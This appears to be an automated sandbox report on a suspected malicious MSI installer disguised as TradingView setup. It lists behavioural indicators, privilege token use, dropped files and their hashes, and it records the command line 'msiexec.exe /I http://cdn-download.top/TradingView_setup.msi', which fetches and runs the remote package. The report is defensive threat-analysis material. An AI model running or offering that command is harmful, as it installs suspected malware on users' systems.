Analysis
max time kernel: 505s
max time network: 508s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 25-01-2023 11:37
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: http://cdn-download.top/TradingView_setup.msi
Resource: win10v2004-20220812-en

General
Target: http://cdn-download.top/TradingView_setup.msi
Malware Config

Signatures
Blocklisted process makes network request (1 IoC)
Processes:
  flow  pid   process
  5     3664  msiexec.exe
Loads dropped DLL (6 IoCs)
Processes:
  pid   process
  1096  MsiExec.exe
  1096  MsiExec.exe
  1096  MsiExec.exe
  1096  MsiExec.exe
  1096  MsiExec.exe
  1096  MsiExec.exe
Unknown use of msiexec with remote resource (1 IoC)
Processes:
  pid   process
  3664  msiexec.exe
Enumerates connected drives (3 TTPs, 48 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
  description              ioc     process
  File opened (read-only)  \??\M:  msiexec.exe
  File opened (read-only)  \??\Q:  msiexec.exe
  File opened (read-only)  \??\I:  msiexec.exe
  File opened (read-only)  \??\K:  msiexec.exe
  File opened (read-only)  \??\Q:  msiexec.exe
  File opened (read-only)  \??\X:  msiexec.exe
  File opened (read-only)  \??\K:  msiexec.exe
  File opened (read-only)  \??\N:  msiexec.exe
  File opened (read-only)  \??\Z:  msiexec.exe
  File opened (read-only)  \??\Z:  msiexec.exe
  File opened (read-only)  \??\E:  msiexec.exe
  File opened (read-only)  \??\F:  msiexec.exe
  File opened (read-only)  \??\H:  msiexec.exe
  File opened (read-only)  \??\O:  msiexec.exe
  File opened (read-only)  \??\S:  msiexec.exe
  File opened (read-only)  \??\Y:  msiexec.exe
  File opened (read-only)  \??\J:  msiexec.exe
  File opened (read-only)  \??\T:  msiexec.exe
  File opened (read-only)  \??\B:  msiexec.exe
  File opened (read-only)  \??\G:  msiexec.exe
  File opened (read-only)  \??\V:  msiexec.exe
  File opened (read-only)  \??\G:  msiexec.exe
  File opened (read-only)  \??\H:  msiexec.exe
  File opened (read-only)  \??\I:  msiexec.exe
  File opened (read-only)  \??\W:  msiexec.exe
  File opened (read-only)  \??\A:  msiexec.exe
  File opened (read-only)  \??\E:  msiexec.exe
  File opened (read-only)  \??\O:  msiexec.exe
  File opened (read-only)  \??\P:  msiexec.exe
  File opened (read-only)  \??\A:  msiexec.exe
  File opened (read-only)  \??\N:  msiexec.exe
  File opened (read-only)  \??\R:  msiexec.exe
  File opened (read-only)  \??\B:  msiexec.exe
  File opened (read-only)  \??\L:  msiexec.exe
  File opened (read-only)  \??\M:  msiexec.exe
  File opened (read-only)  \??\S:  msiexec.exe
  File opened (read-only)  \??\U:  msiexec.exe
  File opened (read-only)  \??\L:  msiexec.exe
  File opened (read-only)  \??\P:  msiexec.exe
  File opened (read-only)  \??\T:  msiexec.exe
  File opened (read-only)  \??\U:  msiexec.exe
  File opened (read-only)  \??\F:  msiexec.exe
  File opened (read-only)  \??\R:  msiexec.exe
  File opened (read-only)  \??\X:  msiexec.exe
  File opened (read-only)  \??\J:  msiexec.exe
  File opened (read-only)  \??\V:  msiexec.exe
  File opened (read-only)  \??\W:  msiexec.exe
  File opened (read-only)  \??\Y:  msiexec.exe
Drops file in Windows directory (1 IoC)
Processes:
  description                   ioc                               process
  File opened for modification  C:\Windows\Installer\MSI86E8.tmp  msiexec.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes:
  description                           pid   process
  Token: SeShutdownPrivilege            3664  msiexec.exe
  Token: SeIncreaseQuotaPrivilege       3664  msiexec.exe
  Token: SeRestorePrivilege             3664  msiexec.exe
  Token: SeTakeOwnershipPrivilege       3664  msiexec.exe
  Token: SeSecurityPrivilege            3896  msiexec.exe
  Token: SeCreateTokenPrivilege         3664  msiexec.exe
  Token: SeAssignPrimaryTokenPrivilege  3664  msiexec.exe
  Token: SeLockMemoryPrivilege          3664  msiexec.exe
  Token: SeIncreaseQuotaPrivilege       3664  msiexec.exe
  Token: SeMachineAccountPrivilege      3664  msiexec.exe
  Token: SeTcbPrivilege                 3664  msiexec.exe
  Token: SeSecurityPrivilege            3664  msiexec.exe
  Token: SeTakeOwnershipPrivilege       3664  msiexec.exe
  Token: SeLoadDriverPrivilege          3664  msiexec.exe
  Token: SeSystemProfilePrivilege       3664  msiexec.exe
  Token: SeSystemtimePrivilege          3664  msiexec.exe
  Token: SeProfSingleProcessPrivilege   3664  msiexec.exe
  Token: SeIncBasePriorityPrivilege     3664  msiexec.exe
  Token: SeCreatePagefilePrivilege      3664  msiexec.exe
  Token: SeCreatePermanentPrivilege     3664  msiexec.exe
  Token: SeBackupPrivilege              3664  msiexec.exe
  Token: SeRestorePrivilege             3664  msiexec.exe
  Token: SeShutdownPrivilege            3664  msiexec.exe
  Token: SeDebugPrivilege               3664  msiexec.exe
  Token: SeAuditPrivilege               3664  msiexec.exe
  Token: SeSystemEnvironmentPrivilege   3664  msiexec.exe
  Token: SeChangeNotifyPrivilege        3664  msiexec.exe
  Token: SeRemoteShutdownPrivilege      3664  msiexec.exe
  Token: SeUndockPrivilege              3664  msiexec.exe
  Token: SeSyncAgentPrivilege           3664  msiexec.exe
  Token: SeEnableDelegationPrivilege    3664  msiexec.exe
  Token: SeManageVolumePrivilege        3664  msiexec.exe
  Token: SeImpersonatePrivilege         3664  msiexec.exe
  Token: SeCreateGlobalPrivilege        3664  msiexec.exe
  Token: SeCreateTokenPrivilege         3664  msiexec.exe
  Token: SeAssignPrimaryTokenPrivilege  3664  msiexec.exe
  Token: SeLockMemoryPrivilege          3664  msiexec.exe
  Token: SeIncreaseQuotaPrivilege       3664  msiexec.exe
  Token: SeMachineAccountPrivilege      3664  msiexec.exe
  Token: SeTcbPrivilege                 3664  msiexec.exe
  Token: SeSecurityPrivilege            3664  msiexec.exe
  Token: SeTakeOwnershipPrivilege       3664  msiexec.exe
  Token: SeLoadDriverPrivilege          3664  msiexec.exe
  Token: SeSystemProfilePrivilege       3664  msiexec.exe
  Token: SeSystemtimePrivilege          3664  msiexec.exe
  Token: SeProfSingleProcessPrivilege   3664  msiexec.exe
  Token: SeIncBasePriorityPrivilege     3664  msiexec.exe
  Token: SeCreatePagefilePrivilege      3664  msiexec.exe
  Token: SeCreatePermanentPrivilege     3664  msiexec.exe
  Token: SeBackupPrivilege              3664  msiexec.exe
  Token: SeRestorePrivilege             3664  msiexec.exe
  Token: SeShutdownPrivilege            3664  msiexec.exe
  Token: SeDebugPrivilege               3664  msiexec.exe
  Token: SeAuditPrivilege               3664  msiexec.exe
  Token: SeSystemEnvironmentPrivilege   3664  msiexec.exe
  Token: SeChangeNotifyPrivilege        3664  msiexec.exe
  Token: SeRemoteShutdownPrivilege      3664  msiexec.exe
  Token: SeUndockPrivilege              3664  msiexec.exe
  Token: SeSyncAgentPrivilege           3664  msiexec.exe
  Token: SeEnableDelegationPrivilege    3664  msiexec.exe
  Token: SeManageVolumePrivilege        3664  msiexec.exe
  Token: SeImpersonatePrivilege         3664  msiexec.exe
  Token: SeCreateGlobalPrivilege        3664  msiexec.exe
  Token: SeCreateTokenPrivilege         3664  msiexec.exe
Suspicious use of FindShellTrayWindow (2 IoCs)
Processes:
  pid   process
  3664  msiexec.exe
  3664  msiexec.exe
Suspicious use of WriteProcessMemory (3 IoCs)
Processes:
  description                       pid   process      target process
  PID 3896 wrote to memory of 1096  3896  msiexec.exe  MsiExec.exe
  PID 3896 wrote to memory of 1096  3896  msiexec.exe  MsiExec.exe
  PID 3896 wrote to memory of 1096  3896  msiexec.exe  MsiExec.exe
Processes

C:\Windows\system32\msiexec.exe
  command line: msiexec.exe /I http://cdn-download.top/TradingView_setup.msi
  - Blocklisted process makes network request
  - Unknown use of msiexec with remote resource
  - Enumerates connected drives
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow

C:\Windows\system32\msiexec.exe
  command line: C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Windows\syswow64\MsiExec.exe
    command line: C:\Windows\syswow64\MsiExec.exe -Embedding 76AB742682231C35C5F5C0CBF218F3AA C
    - Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\AppData\Local\Temp\MSI1D6C.tmp
Filesize: 377KB
MD5: af61221c6f4e9ab3ac2440b25d751868
SHA1: 094f68ff354ac4c8dbdfe4689cb821f8d25880b8
SHA256: 1e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8
SHA512: c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791
C:\Users\Admin\AppData\Local\Temp\MSI205B.tmp
Filesize: 377KB
MD5: af61221c6f4e9ab3ac2440b25d751868
SHA1: 094f68ff354ac4c8dbdfe4689cb821f8d25880b8
SHA256: 1e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8
SHA512: c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791
C:\Users\Admin\AppData\Local\Temp\MSI2108.tmp
Filesize: 377KB
MD5: af61221c6f4e9ab3ac2440b25d751868
SHA1: 094f68ff354ac4c8dbdfe4689cb821f8d25880b8
SHA256: 1e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8
SHA512: c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791
C:\Users\Admin\AppData\Local\Temp\MSI2167.tmp
Filesize: 377KB
MD5: af61221c6f4e9ab3ac2440b25d751868
SHA1: 094f68ff354ac4c8dbdfe4689cb821f8d25880b8
SHA256: 1e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8
SHA512: c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791
C:\Users\Admin\AppData\Local\Temp\MSI2187.tmp
Filesize: 377KB
MD5: af61221c6f4e9ab3ac2440b25d751868
SHA1: 094f68ff354ac4c8dbdfe4689cb821f8d25880b8
SHA256: 1e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8
SHA512: c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791
C:\Users\Admin\AppData\Local\Temp\MSI22A1.tmp
Filesize: 837KB
MD5: e76f80f8c9a51813813c351e35bf0755
SHA1: ec69253f3fd681d2829d60f3a14a48c779fabbb4
SHA256: 87388281ef2eb907b4ad843c8bc0e3ec13dae903edfe53b29f78557588eb5161
SHA512: 134a7be4012dc52763e5ac28eed7ce8e423a913f17449a672ce9f1192e69e5e00c62bce1f0374f76443832345eded1668f28fb9fbe7d287fc51dfdc199911dc5
memory/1096-132-0x0000000000000000-mapping.dmp